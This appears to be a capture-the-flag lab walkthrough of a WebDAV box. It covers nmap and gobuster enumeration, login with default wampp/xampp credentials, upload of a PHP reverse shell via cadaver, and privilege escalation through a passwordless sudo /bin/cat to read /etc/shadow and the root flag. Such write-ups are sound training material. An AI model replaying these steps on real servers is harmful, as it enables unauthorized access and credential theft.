Nmap
1
2
3
4
5
6
7
8
9
10
11
|
ββ$ nmap -sC -sV -oA nmap/dav 10.10.88.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 18:51 EST
Nmap scan report for 10.10.88.48
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
So basically only one port is open, that is 80
.
Also, on this port there is a default page of apache2.

Next logical step will be to search for directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
ββ$ gobuster dir -u 10.10.88.48 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.88.48
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd (Status: 403) [Size: 295]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 299]
/webdav (Status: 401) [Size: 458]
|
We found a directory named as /webdav
but it is asking for username and password.

After searching through internet about webdav, I found default credentials - https://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html
user: wampp
pass: xampp
User flag
I found a file passwd.dav
on server and in that file, I found this credentials
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
but I cannot be able to crack it.
I found a blog which is about exploiting webdav - https://vk9-sec.com/exploiting-webdav/ and uploading the rev shell using php.
1
2
3
4
5
6
7
8
|
ββ$ cadaver http://10.10.188.137/webdav
Authentication required for webdav on server `10.10.188.137':
Username: wampp
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav 44 Aug 25 2019
dav:/webdav/> put php-reverse-shell.php
|
On visiting the website, we got the shell!!
1
2
3
4
5
6
7
8
9
10
11
|
$ whoami
www-data
$ cd /home
$ ls
merlin
wampp
$ cd merlin
$ ls
user.txt
$ cat user.txt
449b40fe93f78a938523b7e4dcd66d2a
|
Root flag
we can use /bin/cat
as sudo user.
1
2
3
4
5
6
7
8
|
www-data@ubuntu:/home/merlin$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/cat
|
Here is the /etc/shadow
file and I have tried to use john in order to crack this hash. But it is of no use. Then I remember⦠we have cat
as root.
Simply reading root file will also work!
1
2
3
|
www-data@ubuntu:/$ sudo cat /root/root.txt
sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
|